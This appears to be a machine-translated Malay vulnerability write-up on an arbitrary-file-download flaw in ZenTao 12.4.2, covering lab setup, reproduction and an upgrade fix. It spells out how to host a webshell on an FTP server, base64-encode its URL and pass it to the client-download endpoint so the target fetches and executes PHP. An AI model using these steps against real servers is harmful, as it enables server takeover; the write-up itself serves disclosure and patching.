Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?

0x00Pengenalan

ZenTao ialah perisian pengurusan projek R&D sumber terbuka domestik profesional yang mengintegrasikan pengurusan produk dan pengurusan projek, kualiti pengurusan, pengurusan dokumen, pengurusan organisasi dan pengurusan transaksi, merangkumi sepenuhnya proses teras pengurusan projek R&D. Idea pengurusan adalah berdasarkan kaedah pengurusan projek tangkas yang popular di peringkat antarabangsa - Scrum Atas dasar mengikut nilainya dan menggabungkan status semasa penyelidikan dan pembangunan projek domestik, ia mengintegrasikan pelbagai fungsi seperti pengurusan tugas, pengurusan permintaan, pepijat. pengurusan, pengurusan kes penggunaan, dsb., meliputi perisian daripada perancangan hingga ke seluruh kitaran hayat keluaran.

Gambaran Keseluruhan Kerentanan 0x01

Terdapat kerentanan muat turun fail sewenang-wenangnya dalam ZenTao versi 12.4.2 Kerentanan ini disebabkan oleh penapisan longgar dalam kaedah muat turun dalam klien kelas, yang boleh dicapai menggunakan ftp Tujuan memuat turun fail. Dan direktori storan fail yang dimuat turun boleh menghuraikan fail php, menyebabkan getshell.

0x02 versi terjejas

ZenTao ≤ 12.4.2

0x03 pembinaan persekitaran

phpstudy2018 12.4.2 Alamat muat turun rasmi ZenTao:

https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html

3.1. Selepas muat turun selesai, letakkan Just install ia dalam phpstudy

3.2 Semak sambungan Jika ada sambungan yang gagal, buka sahaja sambungan itu.

3.3 Tetapkan maklumat pangkalan data, di sini tetapkan kepada konfigurasi pangkalan data anda sendiri.

3.4. Tetapan dan pemasangan akaun selesai

3.4. Gunakan persekitaran untuk menyediakan dan mendayakan perkhidmatan ftp Dengan mengambil windows2008R2 sebagai contoh, tambah peranan dan tambah ftp

3.5 dalam Perkhidmatan Maklumat Internet Tambah perkhidmatan ftp ke tapak web di bawah.

3.6 Konfigurasikan mengikut situasi anda sendiri, langkah seterusnya ialah

<.>

3.7 Letakkan cangkerang web dalam direktori ftp dan semak dengan penyemak imbas sama ada ftp boleh diakses secara normal

0x04. pengulangan kerentanan

1 Mula-mula tambah laluan ftp ke shell dan lakukan pengekodan base64

Sebelum penyulitan: ftp://192.168.3.200/shell.php

Selepas penyulitan: ZnRwJTNBLy8xOTIuMTY4LjMuMjAwL3NoZWxsLnBocA==

2 Gunakan EXP dan masukkan base64 yang disulitkan ke dalam php /client-download-1--1.html

3 laluan untuk menguji Adakah shell telah dimuat turun ke pelayan >0x05 kaedah pembaikan

1 Naik taraf kepada ZenTao 12.4.3 dan versi yang lebih baru

Atas ialah kandungan terperinci Apakah hak pentadbir latar belakang Getshell dalam ZenTao 12.4.2?. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!